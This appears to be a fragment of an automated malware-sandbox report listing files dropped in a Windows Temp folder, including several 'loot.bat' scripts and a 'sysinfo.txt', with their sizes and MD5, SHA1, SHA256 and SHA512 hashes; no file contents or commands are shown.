a1e40d42b420ef30ecc905600fc5653bc0b524c1ca5c60d0a4e9b0fbd48d84a068cb414627f5b9bb9b40d6928a97d86bfa6dd563150e9aadfc4b5525023f6b44

Download Submit
C:\Users\Admin\AppData\Local\Temp\loot.bat

Filesize
5KB

MD5
572a26f72e14ac320c499e686006a162

SHA1
9f25ce2a52c94bb9d74fa06698ad52119c15f7e2

SHA256
2340d48f80ea193bb5856f0de11e3ee84c0ef4b85cd62b975b31b2de69e40efe

SHA512
2295372d760e75ebd238a110b5c18a6e4bf51800755fe38360c5d63f93e0e284fc4b3c58809d238cbcd4a4c1d22edf5771c5c896e80ff93d537b124cc8099bc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\loot.bat

Filesize
5KB

MD5
0dcc55ed34e375eaeaf9d3f5ed182658

SHA1
aa03c5ae8a639c9f05cfa880227203bba55e68cb

SHA256
010b7f978e0e4a523f40ce341743491e941a8e9166e6579bbd772cd910ce4a88

SHA512
956cf1bc9398ee8c3bd2282c8141191ce16b36187d71c7c7db2e2f35acac9903bdd316c4e0a049117217cb180f7f97ed6a123855223d46b7cc6d6959c92819ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\loot.bat

Filesize
817B

MD5
ca65df996ae282daba30c901e4ae17f4

SHA1
3b77b78e662bdc3695cc8b110c1b07cf45e7ef6b

SHA256
2751f39667fed58dba163c96d96fb60fd431e3c5455087a5fffda828234dc183

SHA512
8b6e7ce1fe42f4b8813da138fbd33bc8f1bec37769270ef276633c220db299c05491e883fd5832632d5ddd694db0f3ebc7ed0eeb4b6d6137e8b1cff4e638100f

Download Submit
C:\Users\Admin\AppData\Local\Temp\sysinfo.txt

Filesize
348B

MD5
29da0f6d11d76272dbb520c3a8e7a543

SHA1
a047157673ff6b9f1122782c56cabbaa52b84909

SHA256
b35dc5a6af02b6137094874959d24ac33d0ac434bfa371c941ff1e92ddf29d7d

SHA512
5ff520340124eb168e4c22c1ab9f731015c5991ddeae9b78ddde174d2baf85932abd74a5689d9bfb79898989cc9affe1faf4e602ede708922e48fa9d150a688b

Download Submit